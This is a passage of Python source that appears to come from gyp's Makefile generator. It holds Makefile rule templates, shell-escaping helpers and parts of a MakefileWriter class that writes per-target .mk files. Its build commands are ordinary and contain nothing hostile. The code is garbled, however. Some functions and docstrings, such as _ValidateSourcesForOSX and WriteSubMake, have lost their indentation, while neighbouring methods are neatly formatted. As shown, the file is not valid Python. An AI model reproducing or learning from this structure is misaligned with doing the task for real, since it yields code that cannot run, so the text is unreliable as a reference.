cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) -X32_64 crs $@ $(filter %.o,$^)
quiet_cmd_link = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ $(LD_INPUTS) $(LIBS)
quiet_cmd_solink = SOLINK($(TOOLSET)) $@
cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ $(LD_INPUTS) $(LIBS)
quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ $(filter-out FORCE_DO_CMD, $^) $(LIBS)
"""
# Header of toplevel Makefile.
# This should go into the build tree, but it's easier to keep it here for now.
SHARED_HEADER = ("""\
# We borrow heavily from the kernel build setup, though we are simpler since
# we don't have Kconfig tweaking settings on us.
# The implicit make rules have it looking for RCS files, among other things.
# We instead explicitly write all the rules we care about.
# It's even quicker (saves ~200ms) to pass -r on the command line.
MAKEFLAGS=-r
# The source directory tree.
srcdir := %(srcdir)s
abs_srcdir := $(abspath $(srcdir))
# The name of the builddir.
builddir_name ?= %(builddir)s
# The V=1 flag on command line makes us verbosely print command lines.
ifdef V
quiet=
else
quiet=quiet_
endif
# Specify BUILDTYPE=Release on the command line for a release build.
BUILDTYPE ?= %(default_configuration)s
# Directory all our build output goes into.
# Note that this must be two directories beneath src/ for unit tests to pass,
# as they reach into the src/ directory for data with relative paths.
builddir ?= $(builddir_name)/$(BUILDTYPE)
abs_builddir := $(abspath $(builddir))
depsdir := $(builddir)/.deps
# Object output directory.
obj := $(builddir)/obj
abs_obj := $(abspath $(obj))
# We build up a list of every single one of the targets so we can slurp in the
# generated dependency rule Makefiles in one pass.
all_deps :=
%(make_global_settings)s
CC.target ?= %(CC.target)s
CFLAGS.target ?= $(CPPFLAGS) $(CFLAGS)
CXX.target ?= %(CXX.target)s
CXXFLAGS.target ?= $(CPPFLAGS) $(CXXFLAGS)
LINK.target ?= %(LINK.target)s
LDFLAGS.target ?= $(LDFLAGS)
AR.target ?= $(AR)
# C++ apps need to be linked with g++.
LINK ?= $(CXX.target)
# TODO(evan): move all cross-compilation logic to gyp-time so we don't need
# to replicate this environment fallback in make as well.
CC.host ?= %(CC.host)s
CFLAGS.host ?= $(CPPFLAGS_host) $(CFLAGS_host)
CXX.host ?= %(CXX.host)s
CXXFLAGS.host ?= $(CPPFLAGS_host) $(CXXFLAGS_host)
LINK.host ?= %(LINK.host)s
LDFLAGS.host ?=
AR.host ?= %(AR.host)s
# Define a dir function that can handle spaces.
# http://www.gnu.org/software/make/manual/make.html#Syntax-of-Functions
# "leading spaces cannot appear in the text of the first argument as written.
# These characters can be put into the argument value by variable substitution."
empty :=
space := $(empty) $(empty)
# http://stackoverflow.com/questions/1189781/using-make-dir-or-notdir-on-a-path-with-spaces
replace_spaces = $(subst $(space),""" + SPACE_REPLACEMENT + """,$1)
unreplace_spaces = $(subst """ + SPACE_REPLACEMENT + """,$(space),$1)
dirx = $(call unreplace_spaces,$(dir $(call replace_spaces,$1)))
# Flags to make gcc output dependency info. Note that you need to be
# careful here to use the flags that ccache and distcc can understand.
# We write to a dep file on the side first and then rename at the end
# so we can't end up with a broken dep file.
depfile = $(depsdir)/$(call replace_spaces,$@).d
DEPFLAGS = -MMD -MF $(depfile).raw
# We have to fixup the deps output in a few ways.
# (1) the file output should mention the proper .o file.
# ccache or distcc lose the path to the target, so we convert a rule of
# the form:
# foobar.o: DEP1 DEP2
# into
# path/to/foobar.o: DEP1 DEP2
# (2) we want missing files not to cause us to fail to build.
# We want to rewrite
# foobar.o: DEP1 DEP2 \\
# DEP3
# to
# DEP1:
# DEP2:
# DEP3:
# so if the files are missing, they're just considered phony rules.
# We have to do some pretty insane escaping to get those backslashes
# and dollar signs past make, the shell, and sed at the same time.
# Doesn't work with spaces, but that's fine: .d files have spaces in
# their names replaced with other characters."""
r"""
define fixup_dep
# The depfile may not exist if the input file didn't have any #includes.
touch $(depfile).raw
# Fixup path as in (1).
sed -e "s|^$(notdir $@)|$@|" $(depfile).raw >> $(depfile)
# Add extra rules as in (2).
# We remove slashes and replace spaces with new lines;
# remove blank lines;
# delete the first line and append a colon to the remaining lines.
sed -e 's|\\||' -e 'y| |\n|' $(depfile).raw |\
grep -v '^$$' |\
sed -e 1d -e 's|$$|:|' \
>> $(depfile)
rm $(depfile).raw
endef
"""
"""
# Command definitions:
# - cmd_foo is the actual command to run;
# - quiet_cmd_foo is the brief-output summary of the command.
quiet_cmd_cc = CC($(TOOLSET)) $@
cmd_cc = $(CC.$(TOOLSET)) $(GYP_CFLAGS) $(DEPFLAGS) $(CFLAGS.$(TOOLSET)) -c -o $@ $<
quiet_cmd_cxx = CXX($(TOOLSET)) $@
cmd_cxx = $(CXX.$(TOOLSET)) $(GYP_CXXFLAGS) $(DEPFLAGS) $(CXXFLAGS.$(TOOLSET)) -c -o $@ $<
%(extra_commands)s
quiet_cmd_touch = TOUCH $@
cmd_touch = touch $@
quiet_cmd_copy = COPY $@
# send stderr to /dev/null to ignore messages when linking directories.
cmd_copy = rm -rf "$@" && cp %(copy_archive_args)s "$<" "$@"
%(link_commands)s
"""
r"""
# Define an escape_quotes function to escape single quotes.
# This allows us to handle quotes properly as long as we always use
# use single quotes and escape_quotes.
escape_quotes = $(subst ','\'',$(1))
# This comment is here just to include a ' to unconfuse syntax highlighting.
# Define an escape_vars function to escape '$' variable syntax.
# This allows us to read/write command lines with shell variables (e.g.
# $LD_LIBRARY_PATH), without triggering make substitution.
escape_vars = $(subst $$,$$$$,$(1))
# Helper that expands to a shell command to echo a string exactly as it is in
# make. This uses printf instead of echo because printf's behaviour with respect
# to escape sequences is more portable than echo's across different shells
# (e.g., dash, bash).
exact_echo = printf '%%s\n' '$(call escape_quotes,$(1))'
"""
"""
# Helper to compare the command we're about to run against the command
# we logged the last time we ran the command. Produces an empty
# string (false) when the commands match.
# Tricky point: Make has no string-equality test function.
# The kernel uses the following, but it seems like it would have false
# positives, where one string reordered its arguments.
# arg_check = $(strip $(filter-out $(cmd_$(1)), $(cmd_$@)) \\
# $(filter-out $(cmd_$@), $(cmd_$(1))))
# We instead substitute each for the empty string into the other, and
# say they're equal if both substitutions produce the empty string.
# .d files contain """ + SPACE_REPLACEMENT + \
""" instead of spaces, take that into account.
command_changed = $(or $(subst $(cmd_$(1)),,$(cmd_$(call replace_spaces,$@))),\\
$(subst $(cmd_$(call replace_spaces,$@)),,$(cmd_$(1))))
# Helper that is non-empty when a prerequisite changes.
# Normally make does this implicitly, but we force rules to always run
# so we can check their command lines.
# $? -- new prerequisites
# $| -- order-only dependencies
prereq_changed = $(filter-out FORCE_DO_CMD,$(filter-out $|,$?))
# Helper that executes all postbuilds until one fails.
define do_postbuilds
@E=0;\\
for p in $(POSTBUILDS); do\\
eval $$p;\\
E=$$?;\\
if [ $$E -ne 0 ]; then\\
break;\\
fi;\\
done;\\
if [ $$E -ne 0 ]; then\\
rm -rf "$@";\\
exit $$E;\\
fi
endef
# do_cmd: run a command via the above cmd_foo names, if necessary.
# Should always run for a given target to handle command-line changes.
# Second argument, if non-zero, makes it do asm/C/C++ dependency munging.
# Third argument, if non-zero, makes it do POSTBUILDS processing.
# Note: We intentionally do NOT call dirx for depfile, since it contains """ + \
SPACE_REPLACEMENT + """ for
# spaces already and dirx strips the """ + SPACE_REPLACEMENT + \
""" characters.
define do_cmd
$(if $(or $(command_changed),$(prereq_changed)),
@$(call exact_echo, $($(quiet)cmd_$(1)))
@mkdir -p "$(call dirx,$@)" "$(dir $(depfile))"
$(if $(findstring flock,$(word %(flock_index)d,$(cmd_$1))),
@$(cmd_$(1))
@echo " $(quiet_cmd_$(1)): Finished",
@$(cmd_$(1))
)
@$(call exact_echo,$(call escape_vars,cmd_$(call replace_spaces,$@) := $(cmd_$(1)))) > $(depfile)
@$(if $(2),$(fixup_dep))
$(if $(and $(3), $(POSTBUILDS)),
$(call do_postbuilds)
)
)
endef
# Declare the "%(default_target)s" target first so it is the default,
# even though we don't have the deps yet.
.PHONY: %(default_target)s
%(default_target)s:
# make looks for ways to re-generate included makefiles, but in our case, we
# don't have a direct way. Explicitly telling make that it has nothing to do
# for them makes it go faster.
%%.d: ;
# Use FORCE_DO_CMD to force a target to run. Should be coupled with
# do_cmd.
.PHONY: FORCE_DO_CMD
FORCE_DO_CMD:
""")
SHARED_HEADER_MAC_COMMANDS = """
quiet_cmd_objc = CXX($(TOOLSET)) $@
cmd_objc = $(CC.$(TOOLSET)) $(GYP_OBJCFLAGS) $(DEPFLAGS) -c -o $@ $<
quiet_cmd_objcxx = CXX($(TOOLSET)) $@
cmd_objcxx = $(CXX.$(TOOLSET)) $(GYP_OBJCXXFLAGS) $(DEPFLAGS) -c -o $@ $<
# Commands for precompiled header files.
quiet_cmd_pch_c = CXX($(TOOLSET)) $@
cmd_pch_c = $(CC.$(TOOLSET)) $(GYP_PCH_CFLAGS) $(DEPFLAGS) $(CXXFLAGS.$(TOOLSET)) -c -o $@ $<
quiet_cmd_pch_cc = CXX($(TOOLSET)) $@
cmd_pch_cc = $(CC.$(TOOLSET)) $(GYP_PCH_CXXFLAGS) $(DEPFLAGS) $(CXXFLAGS.$(TOOLSET)) -c -o $@ $<
quiet_cmd_pch_m = CXX($(TOOLSET)) $@
cmd_pch_m = $(CC.$(TOOLSET)) $(GYP_PCH_OBJCFLAGS) $(DEPFLAGS) -c -o $@ $<
quiet_cmd_pch_mm = CXX($(TOOLSET)) $@
cmd_pch_mm = $(CC.$(TOOLSET)) $(GYP_PCH_OBJCXXFLAGS) $(DEPFLAGS) -c -o $@ $<
# gyp-mac-tool is written next to the root Makefile by gyp.
# Use $(4) for the command, since $(2) and $(3) are used as flag by do_cmd
# already.
quiet_cmd_mac_tool = MACTOOL $(4) $<
cmd_mac_tool = ./gyp-mac-tool $(4) $< "$@"
quiet_cmd_mac_package_framework = PACKAGE FRAMEWORK $@
cmd_mac_package_framework = ./gyp-mac-tool package-framework "$@" $(4)
quiet_cmd_infoplist = INFOPLIST $@
cmd_infoplist = $(CC.$(TOOLSET)) -E -P -Wno-trigraphs -x c $(INFOPLIST_DEFINES) "$<" -o "$@"
"""
def WriteRootHeaderSuffixRules(writer):
  """Emit the top-level suffix rules into *writer*.

  Three rule groups are written, each preceded by its banner: building from
  the source directory, from generated source under $(obj).$(TOOLSET), and
  from $(obj) directly.  All outputs land in $(obj).
  """
  extensions = sorted(COMPILABLE_EXTENSIONS.keys(), key=str.lower)

  # (banner, rule-line template) for each of the three source locations.
  rule_groups = (
      ('# Suffix rules, putting all outputs into $(obj).\n',
       '$(obj).$(TOOLSET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD\n'),
      ('\n# Try building from generated source, too.\n',
       '$(obj).$(TOOLSET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD\n'),
      ('\n',
       '$(obj).$(TOOLSET)/%%.o: $(obj)/%%%s FORCE_DO_CMD\n'),
  )
  for banner, rule_template in rule_groups:
    writer.write(banner)
    for ext in extensions:
      writer.write(rule_template % ext)
      writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
  writer.write('\n')
SHARED_HEADER_SUFFIX_RULES_COMMENT1 = ("""\
# Suffix rules, putting all outputs into $(obj).
""")
SHARED_HEADER_SUFFIX_RULES_COMMENT2 = ("""\
# Try building from generated source, too.
""")
SHARED_FOOTER = """\
# "all" is a concatenation of the "all" targets from all the included
# sub-makefiles. This is just here to clarify.
all:
# Add in dependency-tracking rules. $(all_deps) is the list of every single
# target in our tree. Only consider the ones with .d (dependency) info:
d_files := $(wildcard $(foreach f,$(all_deps),$(depsdir)/$(f).d))
ifneq ($(d_files),)
include $(d_files)
endif
"""
header = """\
# This file is generated by gyp; do not edit.
"""
# Maps every compilable file extension to the do_cmd that compiles it.
COMPILABLE_EXTENSIONS = {
  '.c': 'cc',
  '.cc': 'cxx',
  '.cpp': 'cxx',
  '.cxx': 'cxx',
  '.s': 'cc',
  '.S': 'cc',
}


def Compilable(filename):
  """Return True if the file is compilable (should be in OBJS)."""
  # str.endswith accepts a tuple of suffixes; this replaces the original
  # hand-rolled generator-and-loop scan over the extension table.
  return filename.endswith(tuple(COMPILABLE_EXTENSIONS))
def Linkable(filename):
  """Return True if the file is linkable (should be on the link line)."""
  OBJECT_SUFFIX = '.o'
  return filename.endswith(OBJECT_SUFFIX)
def Target(filename):
  """Translate a compilable filename to its .o target."""
  root, _unused_ext = os.path.splitext(filename)
  return root + '.o'
def EscapeShellArgument(s):
  """Quote *s* so that a POSIX shell interprets it literally.

  Single quotes suppress all interpretation; an embedded single quote is
  emitted as '\\'' (close quote, escaped quote, reopen quote).
  """
  escaped = s.replace("'", "'\\''")
  return "'%s'" % escaped
def EscapeMakeVariableExpansion(s):
  """Escape '$' so make does not treat *s* as a variable expansion."""
  # In make, '$$' is a literal dollar sign.
  return '$$'.join(s.split('$'))
def EscapeCppDefine(s):
  """Escape a CPP define so that it reaches the compiler unaltered."""
  # Shell-quote first, then protect make's '$' expansion; finally escape
  # '#', which would otherwise start a make comment even inside a string.
  for escape in (EscapeShellArgument, EscapeMakeVariableExpansion):
    s = escape(s)
  return s.replace('#', r'\#')
def QuoteIfNecessary(string):
  """Wrap *string* in double quotes iff it already contains one.

  TODO: Should this ideally be replaced with one or more of the escape
  helpers above?
  """
  if '"' not in string:
    return string
  return '"%s"' % string.replace('"', '\\"')
# Characters that are not legal in a make variable name.
_INVALID_MAKE_VAR_CHARS = re.compile(r'[^a-zA-Z0-9_]')


def StringToMakefileVariable(string):
  """Convert a string to a value that is acceptable as a make variable name."""
  return _INVALID_MAKE_VAR_CHARS.sub('_', string)
# Prefix prepended to relative paths by Sourceify(); rebound elsewhere when
# the build output lives outside the source tree.
srcdir_prefix = ''


def Sourceify(path):
  """Convert a path to its source directory form."""
  # Make-variable references and absolute paths pass through untouched.
  if '$(' in path or os.path.isabs(path):
    return path
  return srcdir_prefix + path
def QuoteSpaces(s, quote=r'\ '):
  """Replace each space in *s* with *quote* (backslash-space by default)."""
  return quote.join(s.split(' '))
# TODO: Avoid code duplication with _ValidateSourcesForMSVSProject in msvs.py.
def _ValidateSourcesForOSX(spec, all_sources):
"""Makes sure if duplicate basenames are not specified in the source list.
Arguments:
spec: The target dictionary containing the properties of the target.
"""
if spec.get('type', None) != 'static_library':
return
basenames = {}
for source in all_sources:
name, ext = os.path.splitext(source)
is_compiled_file = ext in [
'.c', '.cc', '.cpp', '.cxx', '.m', '.mm', '.s', '.S']
if not is_compiled_file:
continue
basename = os.path.basename(name) # Don't include extension.
basenames.setdefault(basename, []).append(source)
error = ''
for basename, files in basenames.iteritems():
if len(files) > 1:
error += ' %s: %s\n' % (basename, ' '.join(files))
if error:
print('static library %s has several files with the same basename:\n' %
spec['target_name'] + error + 'libtool on OS X will generate' +
' warnings for them.')
raise GypError('Duplicate basenames in sources section, see list above')
# Map from qualified target to path to output.
# Populated by MakefileWriter.Write() as each target's makefile is emitted;
# consulted by ComputeDeps() of later targets.
target_outputs = {}

# Map from qualified target to any linkable output. A subset
# of target_outputs. E.g. when mybinary depends on liba, we want to
# include liba in the linker line; when otherbinary depends on
# mybinary, we just want to build mybinary first.
target_link_deps = {}
class MakefileWriter(object):
"""MakefileWriter packages up the writing of one target-specific foobar.mk.
Its only real entry point is Write(), and is mostly used for namespacing.
"""
  def __init__(self, generator_flags, flavor):
    """Cache generator settings and pre-render per-extension suffix rules.

    Args:
      generator_flags: dict of generator-wide flags (e.g. android_ndk_version).
      flavor: platform flavor string (e.g. 'mac', 'linux').
    """
    self.generator_flags = generator_flags
    self.flavor = flavor

    # ext -> rendered make suffix rule, for sources in the source dir,
    # in $(obj).$(TOOLSET), and in $(obj) respectively.
    self.suffix_rules_srcdir = {}
    self.suffix_rules_objdir1 = {}
    self.suffix_rules_objdir2 = {}

    # Generate suffix rules for all compilable extensions.
    for ext in COMPILABLE_EXTENSIONS.keys():
      # Suffix rules for source folder.
      self.suffix_rules_srcdir.update({ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD
	@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))})

      # Suffix rules for generated source files.
      self.suffix_rules_objdir1.update({ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD
	@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))})
      self.suffix_rules_objdir2.update({ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj)/%%%s FORCE_DO_CMD
	@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))})
  def Write(self, qualified_target, base_path, output_filename, spec, configs,
            part_of_all):
    """The main entry point: writes a .mk file for a single target.

    Arguments:
      qualified_target: target we're generating
      base_path: path relative to source root we're building in, used to resolve
                 target-relative paths
      output_filename: output .mk file name to write
      spec, configs: gyp info
      part_of_all: flag indicating this target is part of 'all'
    """
    gyp.common.EnsureDirExists(output_filename)

    self.fp = open(output_filename, 'w')

    self.fp.write(header)

    self.qualified_target = qualified_target
    self.path = base_path
    self.target = spec['target_name']
    self.type = spec['type']
    self.toolset = spec['toolset']

    self.is_mac_bundle = gyp.xcode_emulation.IsMacBundle(self.flavor, spec)
    if self.flavor == 'mac':
      self.xcode_settings = gyp.xcode_emulation.XcodeSettings(spec)
    else:
      self.xcode_settings = None

    deps, link_deps = self.ComputeDeps(spec)

    # Some of the generation below can add extra output, sources, or
    # link dependencies. All of the out params of the functions that
    # follow use names like extra_foo.
    extra_outputs = []
    extra_sources = []
    extra_link_deps = []
    extra_mac_bundle_resources = []
    mac_bundle_deps = []

    if self.is_mac_bundle:
      self.output = self.ComputeMacBundleOutput(spec)
      self.output_binary = self.ComputeMacBundleBinaryOutput(spec)
    else:
      self.output = self.output_binary = self.ComputeOutput(spec)

    self.is_standalone_static_library = bool(
        spec.get('standalone_static_library', 0))
    self._INSTALLABLE_TARGETS = ('executable', 'loadable_module',
                                 'shared_library')
    # Installable targets (and standalone static libs) get a short alias and
    # an install path; everything else is addressed by its full output path.
    if (self.is_standalone_static_library or
        self.type in self._INSTALLABLE_TARGETS):
      self.alias = os.path.basename(self.output)
      install_path = self._InstallableTargetInstallPath()
    else:
      self.alias = self.output
      install_path = self.output

    self.WriteLn("TOOLSET := " + self.toolset)
    self.WriteLn("TARGET := " + self.target)

    # Actions must come first, since they can generate more OBJs for use below.
    if 'actions' in spec:
      self.WriteActions(spec['actions'], extra_sources, extra_outputs,
                        extra_mac_bundle_resources, part_of_all)

    # Rules must be early like actions.
    if 'rules' in spec:
      self.WriteRules(spec['rules'], extra_sources, extra_outputs,
                      extra_mac_bundle_resources, part_of_all)

    if 'copies' in spec:
      self.WriteCopies(spec['copies'], extra_outputs, part_of_all)

    # Bundle resources.
    if self.is_mac_bundle:
      all_mac_bundle_resources = (
          spec.get('mac_bundle_resources', []) + extra_mac_bundle_resources)
      self.WriteMacBundleResources(all_mac_bundle_resources, mac_bundle_deps)
      self.WriteMacInfoPlist(mac_bundle_deps)

    # Sources.
    all_sources = spec.get('sources', []) + extra_sources
    if all_sources:
      if self.flavor == 'mac':
        # libtool on OS X generates warnings for duplicate basenames in the same
        # target.
        _ValidateSourcesForOSX(spec, all_sources)
      self.WriteSources(
          configs, deps, all_sources, extra_outputs,
          extra_link_deps, part_of_all,
          gyp.xcode_emulation.MacPrefixHeader(
              self.xcode_settings, lambda p: Sourceify(self.Absolutify(p)),
              self.Pchify))
      # NOTE(review): relies on Python 2 filter()/map() returning lists
      # (sources is tested for truth and iterated repeatedly below) —
      # confirm before running under Python 3.
      sources = filter(Compilable, all_sources)
      if sources:
        self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT1)
        extensions = set([os.path.splitext(s)[1] for s in sources])
        for ext in extensions:
          if ext in self.suffix_rules_srcdir:
            self.WriteLn(self.suffix_rules_srcdir[ext])
        self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT2)
        for ext in extensions:
          if ext in self.suffix_rules_objdir1:
            self.WriteLn(self.suffix_rules_objdir1[ext])
        for ext in extensions:
          if ext in self.suffix_rules_objdir2:
            self.WriteLn(self.suffix_rules_objdir2[ext])
        self.WriteLn('# End of this set of suffix rules')

    # Add dependency from bundle to bundle binary.
    if self.is_mac_bundle:
      mac_bundle_deps.append(self.output_binary)

    self.WriteTarget(spec, configs, deps, extra_link_deps + link_deps,
                     mac_bundle_deps, extra_outputs, part_of_all)

    # Update global list of target outputs, used in dependency tracking.
    target_outputs[qualified_target] = install_path

    # Update global list of link dependencies.
    if self.type in ('static_library', 'shared_library'):
      target_link_deps[qualified_target] = self.output_binary

    # Currently any versions have the same effect, but in future the behavior
    # could be different.
    if self.generator_flags.get('android_ndk_version', None):
      self.WriteAndroidNdkModuleRule(self.target, all_sources, link_deps)

    self.fp.close()
def WriteSubMake(self, output_filename, makefile_path, targets, build_dir):
"""Write a "sub-project" Makefile.
This is a small, wrapper Makefile that calls the top-level Makefile to build
the targets from a single gyp file (i.e. a sub-project).
Arguments:
output_filename: sub-project Makefile name to write
makefile_path: path to the top-level Makefile
targets: list of "all" targets for this sub-project
build_dir: build output directory, relative to the sub-project
"""
gyp.common.EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
# For consistency with other builders, put sub-project build output in the
# sub-project dir (see test/subdirectory/gyptest-subdir-all.py).
self.WriteLn('export builddir_name ?= %s' %
os.path.join(os.path.dirname(output_filename), build_dir))
self.WriteLn('.PHONY: all')
self.WriteLn('all:')
if makefile_path:
makefile_path = ' -C ' + makefile_path
self.WriteLn('\t$(MAKE)%s %s' % (makefile_path, ' '.join(targets)))
self.fp.close()
  def WriteActions(self, actions, extra_sources, extra_outputs,
                   extra_mac_bundle_resources, part_of_all):
    """Write Makefile code for any 'actions' from the gyp input.

    extra_sources: a list that will be filled in with newly generated source
                   files, if any
    extra_outputs: a list that will be filled in with any outputs of these
                   actions (used to make other pieces dependent on these
                   actions)
    part_of_all: flag indicating this target is part of 'all'
    """
    env = self.GetSortedXcodeEnv()
    for action in actions:
      # Each action becomes a cmd_<name>/quiet_cmd_<name> make variable pair.
      name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
                                                 action['action_name']))
      self.WriteLn('### Rules for action "%s":' % action['action_name'])
      inputs = action['inputs']
      outputs = action['outputs']

      # Build up a list of outputs.
      # Collect the output dirs we'll need.
      dirs = set()
      for out in outputs:
        dir = os.path.split(out)[0]
        if dir:
          dirs.add(dir)
      if int(action.get('process_outputs_as_sources', False)):
        extra_sources += outputs
      if int(action.get('process_outputs_as_mac_bundle_resources', False)):
        extra_mac_bundle_resources += outputs

      # Write the actual command.
      action_commands = action['action']
      if self.flavor == 'mac':
        action_commands = [gyp.xcode_emulation.ExpandEnvVars(command, env)
                           for command in action_commands]
      command = gyp.common.EncodePOSIXShellList(action_commands)
      if 'message' in action:
        self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, action['message']))
      else:
        self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, name))
      if len(dirs) > 0:
        command = 'mkdir -p %s' % ' '.join(dirs) + '; ' + command

      cd_action = 'cd %s; ' % Sourceify(self.path or '.')

      # command and cd_action get written to a toplevel variable called
      # cmd_foo. Toplevel variables can't handle things that change per
      # makefile like $(TARGET), so hardcode the target.
      command = command.replace('$(TARGET)', self.target)
      cd_action = cd_action.replace('$(TARGET)', self.target)

      # Set LD_LIBRARY_PATH in case the action runs an executable from this
      # build which links to shared libs from this build.
      # actions run on the host, so they should in theory only use host
      # libraries, but until everything is made cross-compile safe, also use
      # target libraries.
      # TODO(piman): when everything is cross-compile safe, remove lib.target
      self.WriteLn('cmd_%s = LD_LIBRARY_PATH=$(builddir)/lib.host:'
                   '$(builddir)/lib.target:$$LD_LIBRARY_PATH; '
                   'export LD_LIBRARY_PATH; '
                   '%s%s'
                   % (name, cd_action, command))
      self.WriteLn()
      # NOTE(review): outputs[0] below indexes the result of map(), which
      # requires Python 2 list semantics — confirm before porting to py3.
      outputs = map(self.Absolutify, outputs)
      # The makefile rules are all relative to the top dir, but the gyp actions
      # are defined relative to their containing dir. This replaces the obj
      # variable for the action rule with an absolute version so that the output
      # goes in the right place.
      # Only write the 'obj' and 'builddir' rules for the "primary" output (:1);
      # it's superfluous for the "extra outputs", and this avoids accidentally
      # writing duplicate dummy rules for those outputs.
      # Same for environment.
      self.WriteLn("%s: obj := $(abs_obj)" % QuoteSpaces(outputs[0]))
      self.WriteLn("%s: builddir := $(abs_builddir)" % QuoteSpaces(outputs[0]))
      self.WriteSortedXcodeEnv(outputs[0], self.GetSortedXcodeEnv())

      for input in inputs:
        assert ' ' not in input, (
            "Spaces in action input filenames not supported (%s)" % input)
      for output in outputs:
        assert ' ' not in output, (
            "Spaces in action output filenames not supported (%s)" % output)

      # See the comment in WriteCopies about expanding env vars.
      outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
      inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]

      self.WriteDoCmd(outputs, map(Sourceify, map(self.Absolutify, inputs)),
                      part_of_all=part_of_all, command=name)

      # Stuff the outputs in a variable so we can refer to them later.
      outputs_variable = 'action_%s_outputs' % name
      self.WriteLn('%s := %s' % (outputs_variable, ' '.join(outputs)))
      extra_outputs.append('$(%s)' % outputs_variable)
      self.WriteLn()

    self.WriteLn()
  def WriteRules(self, rules, extra_sources, extra_outputs,
                 extra_mac_bundle_resources, part_of_all):
    """Write Makefile code for any 'rules' from the gyp input.

    extra_sources: a list that will be filled in with newly generated source
                   files, if any
    extra_outputs: a list that will be filled in with any outputs of these
                   rules (used to make other pieces dependent on these rules)
    part_of_all: flag indicating this target is part of 'all'
    """
    env = self.GetSortedXcodeEnv()
    for rule in rules:
      # Each (rule, source) pair gets its own cmd_<name>_<count> variable.
      name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
                                                 rule['rule_name']))
      count = 0
      self.WriteLn('### Generated for rule %s:' % name)

      all_outputs = []

      for rule_source in rule.get('rule_sources', []):
        dirs = set()
        (rule_source_dirname, rule_source_basename) = os.path.split(rule_source)
        (rule_source_root, rule_source_ext) = \
            os.path.splitext(rule_source_basename)

        # Expand RULE_INPUT_* placeholders in the declared outputs.
        outputs = [self.ExpandInputRoot(out, rule_source_root,
                                        rule_source_dirname)
                   for out in rule['outputs']]

        for out in outputs:
          dir = os.path.dirname(out)
          if dir:
            dirs.add(dir)
        if int(rule.get('process_outputs_as_sources', False)):
          extra_sources += outputs
        if int(rule.get('process_outputs_as_mac_bundle_resources', False)):
          extra_mac_bundle_resources += outputs
        inputs = map(Sourceify, map(self.Absolutify, [rule_source] +
                                    rule.get('inputs', [])))
        actions = ['$(call do_cmd,%s_%d)' % (name, count)]

        if name == 'resources_grit':
          # HACK: This is ugly. Grit intentionally doesn't touch the
          # timestamp of its output file when the file doesn't change,
          # which is fine in hash-based dependency systems like scons
          # and forge, but not kosher in the make world. After some
          # discussion, hacking around it here seems like the least
          # amount of pain.
          actions += ['@touch --no-create $@']

        # See the comment in WriteCopies about expanding env vars.
        outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
        inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]

        outputs = map(self.Absolutify, outputs)
        all_outputs += outputs
        # Only write the 'obj' and 'builddir' rules for the "primary" output
        # (:1); it's superfluous for the "extra outputs", and this avoids
        # accidentally writing duplicate dummy rules for those outputs.
        self.WriteLn('%s: obj := $(abs_obj)' % outputs[0])
        self.WriteLn('%s: builddir := $(abs_builddir)' % outputs[0])
        self.WriteMakeRule(outputs, inputs, actions,
                           command="%s_%d" % (name, count))
        # Spaces in rule filenames are not supported, but rule variables have
        # spaces in them (e.g. RULE_INPUT_PATH expands to '$(abspath $<)').
        # The spaces within the variables are valid, so remove the variables
        # before checking.
        variables_with_spaces = re.compile(r'\$\([^ ]* \$<\)')
        for output in outputs:
          output = re.sub(variables_with_spaces, '', output)
          assert ' ' not in output, (
              "Spaces in rule filenames not yet supported (%s)" % output)
        self.WriteLn('all_deps += %s' % ' '.join(outputs))

        action = [self.ExpandInputRoot(ac, rule_source_root,
                                       rule_source_dirname)
                  for ac in rule['action']]
        mkdirs = ''
        if len(dirs) > 0:
          mkdirs = 'mkdir -p %s; ' % ' '.join(dirs)
        cd_action = 'cd %s; ' % Sourceify(self.path or '.')

        # action, cd_action, and mkdirs get written to a toplevel variable
        # called cmd_foo. Toplevel variables can't handle things that change
        # per makefile like $(TARGET), so hardcode the target.
        if self.flavor == 'mac':
          action = [gyp.xcode_emulation.ExpandEnvVars(command, env)
                    for command in action]
        action = gyp.common.EncodePOSIXShellList(action)
        action = action.replace('$(TARGET)', self.target)
        cd_action = cd_action.replace('$(TARGET)', self.target)
        mkdirs = mkdirs.replace('$(TARGET)', self.target)

        # Set LD_LIBRARY_PATH in case the rule runs an executable from this
        # build which links to shared libs from this build.
        # rules run on the host, so they should in theory only use host
        # libraries, but until everything is made cross-compile safe, also use
        # target libraries.
        # TODO(piman): when everything is cross-compile safe, remove lib.target
        self.WriteLn(
            "cmd_%(name)s_%(count)d = LD_LIBRARY_PATH="
            "$(builddir)/lib.host:$(builddir)/lib.target:$$LD_LIBRARY_PATH; "
            "export LD_LIBRARY_PATH; "
